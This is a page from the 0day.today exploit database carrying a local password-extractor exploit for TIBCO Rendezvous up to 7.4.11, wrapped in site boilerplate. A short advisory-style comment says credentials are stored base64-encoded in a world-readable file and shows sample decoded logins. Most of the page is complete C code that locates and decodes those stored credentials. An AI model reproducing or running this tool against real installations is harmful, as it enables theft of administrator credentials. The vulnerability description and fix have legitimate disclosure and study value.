0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TIBCO Rendezvous <= 7.4.11 Password Extractor Local Exploit
=========================================================== TIBCO Rendezvous <= 7.4.11 Password Extractor Local Exploit =========================================================== /* Exploit: TIBCO RendezVous local password extractor version <=7.4.11 Affected products: Tibco RendezOVous version <=7.4.11 Author: Andres Tarasco Acu?a (atarasco @ sia.es) Advisory: http://www.514.es Status: Vendor notifification Timeline: ---------------- Discovered: who cares? Exploit coded: xxxxxxxxxxx Vendor Notified: xxxxxxxxx Vendor patch: xxxxxxxxxxxx Public Disclosure: xxxxxxx Description: Tibco products stores login and passwords in base64 without crypting them. Password file is also accesible for everyone (at least under win32 enviroment). Fix: Add restrictive ACLS to avoid data leak D:\Programaci?n\tibco>tibco.exe c:\rvrd.db Tibco RendezVous Password Dumper Affected versions <=v7.4.11 Author: Andres Tarasco ( atarasco @ sia.es) Url: http://www.514.es [+] Tibco Logfile Opened (44068 bytes) [+] Password Found at offset: 0xe53 (29 bytes) Base64: QWRtaW5pc3RyYXRvcjpBQUFBQUE= Decoded: Administrator:AAAAAA [+] Password Found at offset: 0xe8a (17 bytes) Base64: QWRtaW46ZnV4b3I= Decoded: Admin:fuxor [+] Password Found at offset: 0x104b (17 bytes) Base64: YWRtaW46dGVzdA== Decoded: admin:test [+] Password Found at offset: 0x108a (17 bytes) Base64: QWRtaW46ZnV4b3I= Decoded: Admin:fuxor [+] Password Found at offset: 0x10b5 (17 bytes) Base64: YWRtaW46bWFzdGVy Decoded: admin:master */ #include <stdio.h> #include <windows.h> #define DECODE64(c) (isascii(c) ? base64val[c] : -1) static const char base64val[] = { -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1 }; int Base64Decode( char* out, const char* in, unsigned long size ) { int len = 0; register unsigned char digit1, digit2, digit3, digit4; if (in[0] == '+' && in[1] == ' ') in += 2; if (*in == '\r') return(0); do { digit1 = in[0]; if (DECODE64(digit1) == -1) return(-1); digit2 = in[1]; if (DECODE64(digit2) == -1) return(-1); digit3 = in[2]; if (digit3 != '=' && DECODE64(digit3) == -1) return(-1); digit4 = in[3]; if (digit4 != '=' && DECODE64(digit4) == -1) return(-1); in += 4; *out++ = (DECODE64(digit1) << 2) | (DECODE64(digit2) >> 4); ++len; if (digit3 != '=') { *out++ = ((DECODE64(digit2) << 4) & 0xf0) | (DECODE64(digit3) >> 2); ++len; if (digit4 != '=') { *out++ = ((DECODE64(digit3) << 6) & 0xc0) | DECODE64(digit4); ++len; } } } while (*in && *in != '\r' && digit4 != '='); return (len); } /******************************************************************************/ void main (int argc,char *argv[]) { DWORD size,i,read; int port; char *buffer,l,j,a; char base64pass[0xff],pass[0xff]; unsigned char data[9] = {0x73, 0x65, 0x72, 0x70, 0x61, 0x73, 0x73, 0x00, 0x08}; HANDLE f; int total=0; printf("Tibco RendezVous Password Dumper\n"); printf("Author: Andres Tarasco ( atarasco @ sia.es)\n"); printf("Url: http://www.514.es\n\n"); if (argc!=2) { printf("Usage: Tibco.exe c:\\rvrd.db\n\n"); exit(1); } f=CreateFile(argv[1],GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE , NULL, OPEN_EXISTING, 0, NULL); if (f!=INVALID_HANDLE_VALUE) { size=GetFileSize(f,NULL); if (size>0) { printf("[+] Tibco Logfile Opened (%i bytes)\n",size); buffer=(char *)malloc(size); ReadFile(f, &buffer[0], size, &read, NULL); for(i=0;i<size-sizeof(data);i++) { if (memcmp(&buffer[i],&data[0],sizeof(data))==0) { total++; l=buffer[i+sizeof(data)]; printf("[+] Password Found at offset: 0x%x (%i bytes)\n",i,l); memset(base64pass,'\0',sizeof(pass)); memcpy(&base64pass[0],&buffer[i+sizeof(data)+1],l); printf(" Base64: %s\n",base64pass); j=Base64Decode( pass, base64pass, l ); pass[j]='\0'; printf(" Decoded: %s\n\n",pass); } } if (total==0) { printf("[+] Password not set: Administrator / NULL\n"); } } } else { printf("[-] UNABLE TO %s\n",argv[1]); } return(total); } # 0day.today [2024-12-24] #